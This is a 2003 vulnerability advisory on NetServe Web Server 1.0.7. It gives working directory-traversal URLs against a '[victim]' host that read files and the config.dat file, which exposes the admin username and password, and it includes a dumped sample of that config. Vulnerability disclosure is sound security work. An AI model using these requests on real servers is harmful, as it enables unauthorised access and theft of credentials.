________________________ / | For Contacts: | nimber | e-mail: nimber@mail.ru | nimber@dezigner.ru |Home Page: www.nimber.plux.ru |ICQ: 132614 \________________________ Advisory Information: ================= Application : NetServe Web Server Date : 17.11.2003 Vendor Homepage : http://www.starlots.com/netx/index.html Versions : 1.0.7 (maybe older) Platforms: Windows NT, 95, 98, 2000, and XP. Severity : High Local : yes Remote: yes Tested on WinXP and Win2K. ================= Advisories: Multiple vulnerability in NetServe 1.0.7 ================= The description of a product (from the developer): "About NetServe Web Server NetServe is a super compact Web Server and File Sharing application for Windows NT, 95, 98, 2000, and XP. It's HTTP Web Server can serve all types of files including html, gif and jpeg, actually any files placed in your NetServe directory can be served. New key features include Server-Side-Include (SSI) support and CGI/1.1 support giving you the choice of your preferred scripting language, including but not limited to; Perl, ASP and PHP, to create your dynamic content. Other features include a fully integrated File Sharing application supplying a html front end to allow for directory browsing and download. A html form gives users the ability to upload up-to 5 files simultaneously to any directory. With security in mind, NetServe features admin tools that allow you full control of how users accessing your server see the resources available, just some of the options include, Access served pages only, allow directory browsing, allow file downloading, and even allow file uploading. And of course every action being performed on the NetServe Server is automatically logged, so you can interrogate the logs at a later date for statistics." ================= The contents: ================= + Advisory Information. + Part 1: Directory traversal vulnerability. + Part 2: Viewing of a configuration servers. + Part 3: Access to the admin password. ================= Part - 1: ====== Servers does not filter " /../../ ", that allows to rise on a folder above. The found vulnerability allows to look through contents of folders and files. Example: http://[victim]/../test/ Allows to see contents of a folder - /test/ Example: http://[victim]/../test/test.txt Allows to see contents of a file test.txt which is in a folder /test/ Part- 2: ====== By default in adjustments servers the folder of a site is in [NetServe Web Server folder]\wwwroot\ If the admin did not change this adjustment, using the found vulnerability we can receive access to a file of a configuration servers. Example: http://[victim]/../config.dat Example of a file: ================ EnableCGI True EnableRemoteAdmin True EnableSSI False EnablePasswords True IndexFiles index.html index.htm SSIAbbrevSize True SSIExtensions shtml SSIErrorMessage An SSI Error Has Occured SSITimeFormat AuthenticationType Basic Port 80 ServerRoot D:\Program Files\NetServe Web Server\wwwroot\ Logging True Counter False Minimized True ActivateOnStart False MimeTypes application/mac-binhex40|hqx MimeTypes application/msword|doc MimeTypes application/octet-stream|bin dms lha lzh exe class MimeTypes application/pdf|pdf MimeTypes application/postscript|ai eps ps MimeTypes application/smil|smi smil MimeTypes application/vnd.mif|mif MimeTypes application/vnd.ms-asf|asf MimeTypes application/vnd.ms-excel|xls MimeTypes application/vnd.ms-powerpoint|ppt MimeTypes application/x-cdlink|vcd MimeTypes application/x-compress|Z MimeTypes application/x-cpio|cpio MimeTypes application/x-csh|csh MimeTypes application/x-director|dcr dir dxr MimeTypes application/x-dvi|dvi MimeTypes application/x-gtar|gtar MimeTypes application/x-gzip|gz MimeTypes application/x-javascript|js MimeTypes application/x-latex|latex MimeTypes application/x-sh|sh MimeTypes application/x-shar|shar MimeTypes application/x-shockwave-flash|swf MimeTypes application/x-stuffit|sit MimeTypes application/x-tar|tar MimeTypes application/x-tcl|tcl MimeTypes application/x-tex|tex MimeTypes application/x-texinfo|texinfo texi MimeTypes application/x-troff|t tr roff MimeTypes application/x-troff-man|man MimeTypes application/x-troff-me|me MimeTypes application/x-troff-ms|ms MimeTypes application/zip|zip MimeTypes audio/basic|au snd MimeTypes audio/midi|mid midi kar MimeTypes audio/mpeg|mpga mp2 mp3 MimeTypes audio/x-aiff|aif aiff aifc MimeTypes audio/x-pn-realaudio|ram rm MimeTypes audio/x-realaudio|ra MimeTypes audio/x-wav|wav MimeTypes image/bmp|bmp MimeTypes image/gif|gif MimeTypes image/ief|ief MimeTypes image/jpeg|jpeg jpg jpe MimeTypes image/png|png MimeTypes image/tiff|tiff tif MimeTypes image/x-cmu-raster|ras MimeTypes image/x-portable-anymap|pnm MimeTypes image/x-portable-bitmap|pbm MimeTypes image/x-portable-graymap|pgm MimeTypes image/x-portable-pixmap|ppm MimeTypes image/x-rgb|rgb MimeTypes image/x-xbitmap|xbm MimeTypes image/x-xpixmap|xpm MimeTypes image/x-xwindowdump|xwd MimeTypes image/x-icon|ico MimeTypes model/iges|igs iges MimeTypes model/mesh|msh mesh silo MimeTypes model/vrml|wrl vrml MimeTypes text/css|css MimeTypes text/html|html htm MimeTypes text/plain|asc txt MimeTypes text/richtext|rtx MimeTypes text/rtf|rtf MimeTypes text/sgml|sgml sgm MimeTypes text/tab-separated-values|tsv MimeTypes text/xml|xml MimeTypes video/mpeg|mpeg mpg mpe MimeTypes video/quicktime|qt mov MimeTypes video/x-msvideo|avi Users nimber|password||bmltYmWyfnZpFXmuYW0= Aliases /admin|D:\Program Files\NetServe Web Server\admin ================ Peart-3: ====== Using the above described vulnerability, we can receive the password of the admin for the remote administration servers. It will allow us completely to change a configuration servers! The password and login we can see in a file of a configuration, about which there was a speech above, config.dat. If you pay attention to last lines, it is possible to see the information, necessary to us: ====[config.dat]==== Users nimber|vietnam||bmltYmVyOnZpZXRuYW0= Aliases /admin|D:\Program Files\NetServe Web Server\admin ====[config.dat]==== As we see a folder, in which is scripts of the admin. I want to pay yours of attention, that the password and login are not protected! ================= For Contacts: nimber e-mail: nimber@mail.ru nimber@dezigner.ru Home Page: www.nimber.plux.ru ICQ: 132614 ================= Gr33tz: ZeT, XSPYD3X, euronymous, JLx, Iww, unix, Demon, mestereeo, Pirog, Corpse, x-a13x, insurrectionist, UnInstall, Kabuto and all my friends. Re: krok, 3APA3A, buggzy. p.s> SORRY for my bad english ;) _EOF_